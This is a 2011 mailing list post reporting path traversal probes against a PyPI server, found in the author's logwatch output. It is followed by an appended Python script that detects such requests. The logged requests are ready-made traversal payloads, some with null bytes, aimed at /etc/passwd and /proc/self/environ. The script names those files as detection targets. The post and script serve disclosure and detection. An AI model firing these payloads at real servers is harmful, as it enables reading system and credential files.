[Catalog-sig] Attempts to hack pypi?
Chris Withers
chris at simplistix.co.uk
Fri Dec 2 19:30:07 CET 2011
Hi All,
I got these from a logwatch warning on my server:
/pypi?:action=/../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
/pypi?%3Aaction=../../../../../../../../../../etc/passwd HTTP
Response 302
/pypi?%3Aaction=../../../../../../../../../../proc/self/environ
HTTP Response 302
/pypi?%3Aaction=../../../../../../../../../../etc/passwd%00 HTTP
Response 302
/pypi?:action=../../../../../../../../../../proc/self/environ&provider=myOpenID
HTTP Response 302
/pypi?:action=show_md5&digest=/../../../../../../../../../../proc/self/environ%00
HTTP Response 302
/pypi?:action=show_md5&digest=../../../../../../../../../../proc/self/environ
HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
/pypi?%3Aaction=/../../../../../../../../../../etc/passwd%00 HTTP
Response 302
/pypi?:action=../../../../../../../../../../proc/self/environ&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd&provider=myOpenID
HTTP Response 302
/pypi?:action=/../../../../../../../../../../etc/passwd&provider=myOpenID HTTP
Response 302
/pypi?%3Aaction=/../../../../../../../../../../proc/self/environ%00
HTTP Response 302
/pypi?%3Aaction=/../../../../../../../../../../etc/passwd HTTP
Response 302
/pypi?:action=../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
/pypi?:action=/../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
/pypi?:action=show_md5&digest=/etc/passwd HTTP Response 302
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&provider=myOpenID
HTTP Response 302
/pypi?:action=../../../../../../../../../../etc/passwd%00&provider=myOpenID
HTTP Response 302
/pypi?%3Aaction=/etc/passwd HTTP Response 302
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&digest=517d7c7014d2b581f321d500eed4305e
HTTP Response 302
...which looks a lot like someone trying to hack information from the
PyPI server, so thought I'd let you know...
cheers,
Chris
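A defender-side check for the request pattern reported above, as an added example that is not part of the original message: it percent-decodes each query parameter and flags NUL bytes, `..` segments, and values that resolve to the two files named in the log. The names `inspect_line` and `SAMPLE`, the reason labels, and the benign 200 line are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl

# The two files the quoted requests try to reach.
SENSITIVE = {"/etc/passwd", "/proc/self/environ"}
DOTDOT = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
LINE = re.compile(r"^(?P<target>\S+)\s+HTTP\s+Response\s+(?P<status>\d{3})$")

# Sample input in the shape of the logwatch lines quoted above.
# The first entry is a constructed benign request for contrast.
SAMPLE = [
    "/pypi?:action=show_md5&digest=517d7c7014d2b581f321d500eed4305e HTTP Response 200",
    "/pypi?%3Aaction=../../../../../../../../../../etc/passwd%00 HTTP\nResponse 302",
    "/pypi?:action=show_md5&digest=/etc/passwd HTTP Response 302",
    "/pypi?:action=../../../../../../../../../../proc/self/environ&provider=myOpenID\nHTTP Response 302",
]


def inspect_line(line):
    """Return (status, findings) for one logwatch-style entry.

    findings lists (parameter, sorted reasons) for each suspicious parameter.
    """
    # Entries wrapped across two lines by the mailer are re-joined first.
    m = LINE.match(" ".join(line.split()))
    if not m:
        raise ValueError("unrecognised entry: %r" % line)
    _, _, query = m.group("target").partition("?")
    findings = []
    # parse_qsl percent-decodes names and values: %3Aaction -> :action, %00 -> NUL.
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = set()
        if "\x00" in value:
            reasons.add("null-byte")
        if DOTDOT.search(value):
            reasons.add("dot-dot")
        # Cut at the NUL (what a C string API would see), then resolve from "/".
        cleaned = value.split("\x00", 1)[0].lstrip("/")
        resolved = posixpath.normpath("/" + cleaned)
        if resolved in SENSITIVE:
            reasons.add("sensitive-path:" + resolved)
        if reasons:
            findings.append((name, sorted(reasons)))
    return int(m.group("status")), findings


if __name__ == "__main__":
    for entry in SAMPLE:
        print(inspect_line(entry))
```

Decoding before matching is what lets the `%3Aaction` and `:action` variants, and the `%00` suffix, be reported under the same parameter and reason.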